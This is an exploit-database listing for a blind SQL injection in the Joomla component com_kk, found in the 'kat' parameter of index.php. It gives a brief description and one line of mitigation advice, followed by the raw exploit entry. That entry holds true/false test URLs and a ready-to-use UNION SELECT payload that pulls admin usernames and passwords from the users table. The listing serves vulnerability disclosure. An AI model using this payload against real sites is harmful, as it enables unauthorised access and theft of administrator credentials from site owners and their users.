header-logo
Suggest Exploit
vendor:
com_kk
by:
Pyske | Bug Researchers
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: com_kk
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_kk Blind SQL Injection Vulnerability

An attacker can exploit this vulnerability to gain access to admin login credentials. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'kat' parameter of the 'index.php' script. An attacker can send a maliciously crafted HTTP request to the vulnerable script and gain access to admin login credentials.

Mitigation:

Input validation should be used to sanitize user-supplied input.
Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#############################################################
# Joomla Component com_kk Blind SQL Injection Vulnerability
#############################################################

# Author : Pyske | Bug Researchers


# Name : com_kk


# Bug Type : Blind SQL Injection


# Infection : Admin login bilgileri alinabilir.


# Demo Vuln. :

TRUE(+)

http://localhost/index.php?option=com_kk&kat=1 and 1=1

FALSE(-)

http://localhost/index.php?option=com_kk&kat=1 and 1=0

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path /index.php?option=com_kk&kat=1/**/and/**/1=0/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/klhtrade_users

< -- bug code end of -- >
_________________________________________________________________